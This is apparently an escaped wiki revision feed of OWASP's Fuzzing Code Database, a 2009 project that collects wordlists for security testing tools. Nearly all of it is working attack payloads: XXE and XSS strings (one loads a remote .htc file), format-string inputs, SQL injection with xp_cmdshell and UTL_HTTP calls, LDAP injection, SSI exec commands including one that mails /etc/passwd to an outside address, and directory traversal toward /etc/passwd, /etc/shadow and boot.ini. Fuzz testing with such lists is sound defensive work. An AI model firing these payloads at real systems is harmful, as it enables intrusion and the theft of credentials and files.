&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;]]&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28)===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Project Contributor ====&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]&lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']]&lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project|Fuzzing Code Database]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Alpha Quality Document]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67503</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67503"/>
				<updated>2009-08-11T19:27:12Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.&lt;br /&gt;
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.&lt;br /&gt;
Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News ====&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
'''Update Statements'''&lt;br /&gt;
&lt;br /&gt;
* 15 new XML Statements&lt;br /&gt;
* 93 new SQL Injections Statements&lt;br /&gt;
* 67 new Traversal Directory Statements&lt;br /&gt;
* Delete 33 XSS Statement Duplicate&lt;br /&gt;
* 30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Updated the objectives of the project. &lt;br /&gt;
&lt;br /&gt;
'''21 July 2009'''&lt;br /&gt;
&lt;br /&gt;
* Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.&lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project:&lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project&lt;br /&gt;
2 - Browser&lt;br /&gt;
3 - Operational System&lt;br /&gt;
4 - Databases&lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:&lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.&lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.&lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements.&lt;br /&gt;
&lt;br /&gt;
==== Statements ====&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;apos;&lt;br /&gt;
\\&amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
